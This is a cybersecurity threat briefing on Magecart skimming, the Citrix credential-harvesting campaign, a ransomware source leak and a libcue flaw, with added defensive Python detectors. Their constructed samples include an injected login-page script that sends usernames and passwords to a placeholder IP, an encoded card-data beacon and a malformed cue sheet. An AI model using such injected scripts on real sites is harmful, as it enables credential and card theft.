Cyware Daily Threat Intelligence

Daily Threat Briefing • Oct 10, 2023
Magecart actors keep evolving their tactics, posing a constant threat to online businesses and their customers' card data. Attackers were recently spotted using fake 404 error pages on online retailers' websites to hide malicious code and steal users' credit card information; Magento and WooCommerce sites are primarily at risk. An opportunistic, global campaign also came to light that harvests credentials from Citrix NetScaler gateways affected by an already-patched security vulnerability. So far, attackers have compromised over 600 unique victim IP addresses, mostly in the U.S. and Europe.
Another ransomware source code leak hits the cybercrime world! A threat actor has leaked the source code for a HelloKitty ransomware variant on a Russian-speaking forum. The availability of source code may enable other adversaries to create their own unique versions of the ransomware.
Florida state courts suffer ransomware attack
The ALPHV (BlackCat) ransomware group claimed responsibility for an attack that disrupted state courts across Northwest Florida, impacting the First Judicial Circuit. The threat actors allegedly accessed personal data, including SSNs and CVs of court employees, among them judges. They also claim to possess a network map of the court's systems and credentials. The Circuit has been listed on the group's leak site.
Airline customers advised to remove credit cards
Spanish airline Air Europa has advised its customers to cancel their credit cards following a cyberattack that targeted its online payment system. The company did not disclose the number of affected customers or the timing of the attack. While Air Europa stated that there is no evidence the breach led to fraud, it recommended that customers cancel and replace any bank cards used on its website to prevent potential fraudulent use.
Magecart campaign exploits 404 error pages
A new card skimming campaign discovered by Akamai uses the 404 error pages of online retailers' websites to hide malicious code and steal customers' credit card information. The attackers modify the default '404 Not Found' page so that the skimmer is concealed within the page's HTML and loaded by first-party scripts, which makes it hard to spot: a request for a non-existent path that returns 404 looks like routine noise, yet the response carries the payload. The stolen data is exfiltrated via seemingly benign image requests, so it blends in with ordinary static-asset traffic and evades network monitoring tools that only look for suspicious domains or POST bodies.
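One practical response is to look in web-server access logs for the exfiltration channel the brief describes: image requests whose query strings carry encoded card data. The following is an added example, not Akamai's or the page's own code. The log lines are constructed (Apache/Nginx "combined" format), the stolen record is a test card number, and the image extensions and minimum base64 length are assumptions to tune per site.

```python
"""Detect Magecart-style card exfiltration hidden in image requests.

Added example; the log lines and payload below are constructed.
"""
import base64
import binascii
import json
import re
from urllib.parse import urlsplit, parse_qsl

IMAGE_EXT = (".png", ".gif", ".jpg", ".jpeg", ".webp", ".svg")  # assumption: tune per site
# "combined" log format: client ident user [time] "METHOD path PROTO" status bytes "referer" "ua"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]+" (\d{3}) \S+ "[^"]*" "[^"]*"')
B64_RE = re.compile(r'^[A-Za-z0-9+/=_-]{16,}$')          # assumption: 16+ chars of base64 alphabet
PAN_RE = re.compile(r'(?<!\d)(\d{13,19})(?!\d)')          # candidate primary account numbers


def luhn_ok(digits: str) -> bool:
    """True when the digit string passes the Luhn checksum used by card numbers."""
    total = 0
    for pos, ch in enumerate(reversed(digits)):
        d = int(ch)
        if pos % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def decode_b64(value: str):
    """Decode standard or URL-safe base64, tolerating stripped padding; None on failure."""
    padded = value + "=" * (-len(value) % 4)
    try:
        if "-" in value or "_" in value:
            raw = base64.urlsafe_b64decode(padded)
        else:
            raw = base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-8", errors="ignore")


def find_card_numbers(text: str):
    """Return Luhn-valid 13-19 digit runs found in text."""
    return [m for m in PAN_RE.findall(text) if luhn_ok(m)]


def inspect_request(path: str):
    """Return suspected card numbers carried by an image request's query string, else []."""
    parts = urlsplit(path)
    if not parts.path.lower().endswith(IMAGE_EXT):
        return []
    found = []
    for _, value in parse_qsl(parts.query, keep_blank_values=True):
        value = value.replace(" ", "+")   # parse_qsl turned '+' into ' '; restore base64 alphabet
        candidates = [value]
        if B64_RE.match(value):
            decoded = decode_b64(value)
            if decoded:
                candidates.append(decoded)
        for c in candidates:
            found.extend(find_card_numbers(c))
    return found


def scan_log(lines):
    """Return one finding per log line whose image request carries card-like data."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, path, status = m.groups()
        cards = inspect_request(path)
        if cards:
            hits.append({"client": client, "path": path, "status": int(status), "cards": cards})
    return hits


# Constructed sample: a normal page view, a real image, the 404 that serves the skimmer,
# then the exfil beacon disguised as a GIF fetch. 4111111111111111 is a well-known test PAN.
_STOLEN = base64.urlsafe_b64encode(
    json.dumps({"cc": "4111111111111111", "exp": "12/26", "cvv": "123"}).encode()
).decode().rstrip("=")
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:12:00:01 +0000] "GET /products/shoe HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:12:00:02 +0000] "GET /static/logo.png HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:12:00:03 +0000] "GET /icons/nonexistent-page HTTP/1.1" 404 1460 "-" "Mozilla/5.0"',
    f'203.0.113.7 - - [10/Oct/2023:12:00:09 +0000] "GET /icons/loader.gif?id={_STOLEN} HTTP/1.1" 200 43 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Oct/2023:12:01:00 +0000] "GET /img/banner.jpg?v=20231010 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The Luhn filter keeps version stamps and cache busters (the `?v=20231010` line) out of the results, and decoding both base64 variants catches the common trick of padding-stripped, URL-safe encoding. Pair this with a second query for 404 responses that are fetched repeatedly from the same first-party script path, since that is where the skimmer itself is served.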
HelloKitty ransomware source code leaked
The source code for the initial version of the HelloKitty ransomware has been leaked by a threat actor known as 'kapuchin0' (also associated with the alias 'Gookee') on a Russian-speaking hacking forum. The actor claims to be developing a more powerful encryptor. HelloKitty is a human-operated ransomware operation known for breaking into corporate networks, stealing data, and encrypting systems. Leaked ransomware source code tends to spawn further threats, as previous cases such as HiddenTear and Babuk have shown.
IZ1H9 Mirai-based DDoS campaign goes wild
Security experts with Fortinet laid bare an IZ1H9 attack campaign that aggressively updated its exploit arsenal, targeting vulnerabilities in devices from various vendors, including D-Link, Netis, Sunhillo SureLine, Geutebruck, Yealink, Zyxel, TP-Link Archer, Korenix JetWave, and TOTOLINK. The Mirai-based DDoS campaign leverages multiple CVEs to infect vulnerable devices and grows its botnet by adopting recently released exploit code, so patching lag on these devices translates directly into botnet capacity.
Citrix flaw abused for credential harvesting
Threat actors are reportedly exploiting a critical vulnerability, tracked as CVE-2023-3519, in Citrix NetScaler ADC and Gateway devices. The flaw gives attackers code execution on the appliance, which they are using to insert malicious scripts into authentication pages and steal user credentials. IBM X-Force discovered the campaign, in which attackers triggered the vulnerability, deployed a web shell, and modified NetScaler Gateway login pages to collect usernames and passwords. The campaign has been active for nearly two months, so appliances that were patched after the fix was released should still be checked for web shells and tampered login pages, since patching does not remove an existing compromise.
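Checking for the tampering described above comes down to comparing the login page an appliance serves now against a known-good copy and flagging any script that was not there before. The following is an added example, not IBM X-Force's, Citrix's, or the page's own code. Both HTML documents are constructed: the baseline stands in for a page captured from a trusted appliance, and the script path and the `login`/`passwd` field names are assumptions for illustration.

```python
"""Flag scripts injected into a login page by diffing against a known-good baseline.

Added example; both HTML documents below are constructed.
"""
import hashlib
import re
from html.parser import HTMLParser


class ScriptCollector(HTMLParser):
    """Collect every <script> element as ('src', url) or ('inline', body)."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._inline = None

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            src = dict(attrs).get("src")
            if src:
                self.scripts.append(("src", src.strip()))
                self._inline = None
            else:
                self._inline = []

    def handle_data(self, data):
        if self._inline is not None:
            self._inline.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._inline is not None:
            self.scripts.append(("inline", "".join(self._inline).strip()))
            self._inline = None


def script_fingerprints(html: str):
    """Map each script to a stable key: its src URL, or the SHA-256 of its inline body."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    fps = {}
    for kind, body in parser.scripts:
        key = body if kind == "src" else "inline:" + hashlib.sha256(body.encode()).hexdigest()
        fps[key] = (kind, body)
    return fps


# Heuristics for what an injected harvester usually needs: form fields and a way out.
CRED_HINTS = re.compile(r"(passwd|password|login|username)", re.I)
EXFIL_HINTS = re.compile(r"(XMLHttpRequest|fetch\(|new Image\(|\.src\s*=|sendBeacon)", re.I)


def find_injected_scripts(baseline_html: str, current_html: str):
    """Return scripts present in current_html but absent from the baseline, with reasons."""
    base = script_fingerprints(baseline_html)
    findings = []
    for key, (kind, body) in script_fingerprints(current_html).items():
        if key in base:
            continue
        reasons = ["not in baseline"]
        if kind == "inline" and CRED_HINTS.search(body):
            reasons.append("touches credential fields")
        if kind == "inline" and EXFIL_HINTS.search(body):
            reasons.append("sends data off-box")
        findings.append({"kind": kind, "script": body[:80], "reasons": reasons})
    return findings


def page_digest(html: str) -> str:
    """Whole-page hash, the cheap first check before the script-level diff."""
    return hashlib.sha256(html.encode()).hexdigest()


# Constructed baseline: one legitimate external script and a plain login form.
BASELINE_HTML = (
    '<html><head><script src="/vpn/js/login.js"></script></head>'
    '<body><form id="loginForm"><input name="login">'
    '<input name="passwd" type="password"></form></body></html>'
)
# Constructed tampered copy: an inline script appended before </body> that beacons the
# form fields to a TEST-NET address via an image request.
TAMPERED_HTML = BASELINE_HTML.replace(
    "</body>",
    '<script>document.getElementById("loginForm").addEventListener("submit",function(){'
    'var i=new Image();i.src="https://203.0.113.50/c?u="+encodeURIComponent(login.value)'
    '+"&p="+encodeURIComponent(passwd.value);});</script></body>',
)

if __name__ == "__main__":
    print("digest changed:", page_digest(BASELINE_HTML) != page_digest(TAMPERED_HTML))
    for f in find_injected_scripts(BASELINE_HTML, TAMPERED_HTML):
        print(f)
```

Keying inline scripts by hash rather than by position means a legitimate firmware update that reorders scripts does not fire, while any new body does; a rebaseline after each patch keeps the comparison honest. The same diff works for the Magecart 404-page case above, with the retailer's 404 template as the baseline.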
libcue bug in GNOME Linux systems
A security flaw (CVE-2023-43641) in the libcue library, affecting GNOME Linux systems, has been disclosed. It can lead to RCE when a victim clicks a malicious link and a .cue file is downloaded: Tracker Miners, GNOME's file indexer, parses the downloaded cue sheet automatically, so no further user action is needed. The flaw arises from an out-of-bounds array access in libcue's track_set_index function, which stores a track's INDEX entries without checking that the index number fits the array. By exploiting this vulnerability, attackers can achieve one-click RCE on GNOME systems.
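The defensive point is the missing bounds check. The following is an added example, not libcue's code: a small cue-sheet parser that enforces the check the brief says track_set_index lacked, and a triage helper that reports whether a downloaded .cue file would have reached the unchecked array write. The 0-99 ranges come from the two-digit TRACK and INDEX fields of the cue-sheet format and are assumed limits for this illustration; both sheets are constructed.

```python
"""Bounds-checked cue-sheet parsing, modelled on the CVE-2023-43641 description.

Added example; the sheets below are constructed and the limits are assumptions.
"""
MAX_TRACK = 99   # assumption: cue sheets use two-digit track numbers
MAX_INDEX = 99   # assumption: cue sheets use two-digit index numbers
FRAMES_PER_SECOND = 75


class CueError(ValueError):
    """Raised for any malformed or out-of-range field."""


def parse_bounded(token: str, lo: int, hi: int, name: str, lineno: int) -> int:
    """int() alone accepts 99999 or -1; the unchecked write needs this range check."""
    try:
        value = int(token)
    except ValueError:
        raise CueError(f"line {lineno}: {name} {token!r} is not a number") from None
    if not lo <= value <= hi:
        raise CueError(f"line {lineno}: {name} {value} outside {lo}..{hi}")
    return value


def parse_msf(text: str, lineno: int) -> int:
    """Convert mm:ss:ff into a frame count."""
    parts = text.split(":")
    if len(parts) != 3 or not all(p.isdigit() for p in parts):
        raise CueError(f"line {lineno}: bad time {text!r}")
    m, s, f = (int(p) for p in parts)
    if s > 59 or f >= FRAMES_PER_SECOND:
        raise CueError(f"line {lineno}: time {text!r} out of range")
    return (m * 60 + s) * FRAMES_PER_SECOND + f


def parse_cue(text: str):
    """Return tracks as dicts {number, type, indexes: {index_no: frames}}."""
    tracks = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        parts = raw.split()
        if not parts:
            continue
        keyword = parts[0].upper()
        if keyword == "TRACK":
            if len(parts) != 3:
                raise CueError(f"line {lineno}: TRACK needs a number and a type")
            number = parse_bounded(parts[1], 1, MAX_TRACK, "TRACK", lineno)
            tracks.append({"number": number, "type": parts[2], "indexes": {}})
        elif keyword == "INDEX":
            if not tracks:
                raise CueError(f"line {lineno}: INDEX before any TRACK")
            if len(parts) != 3:
                raise CueError(f"line {lineno}: INDEX needs a number and a time")
            # This is the check the vulnerable track_set_index did not perform.
            index_no = parse_bounded(parts[1], 0, MAX_INDEX, "INDEX", lineno)
            tracks[-1]["indexes"][index_no] = parse_msf(parts[2], lineno)
        # FILE, TITLE, PERFORMER and other keywords do not affect the index table; ignored here.
    return tracks


def check_cue(text: str):
    """Triage helper: (True, 'ok') or (False, reason) for a suspicious download."""
    try:
        parse_cue(text)
    except CueError as exc:
        return False, str(exc)
    return True, "ok"


# Constructed benign sheet.
GOOD_CUE = """FILE "album.wav" WAVE
  TRACK 01 AUDIO
    INDEX 00 00:00:00
    INDEX 01 00:02:00
  TRACK 02 AUDIO
    INDEX 01 03:41:12
"""
# Constructed hostile sheet: an INDEX number far beyond any fixed-size index array.
BAD_CUE = """FILE "x.wav" WAVE
  TRACK 01 AUDIO
    INDEX 99999 00:00:00
"""

if __name__ == "__main__":
    print(check_cue(GOOD_CUE))
    print(check_cue(BAD_CUE))
```

The check rejects negative numbers as well as oversized ones, which matters because a signed index that wraps negative writes before the array rather than after it. A triage script built on check_cue can be run over a quarantined download directory without handing the files to the system indexer.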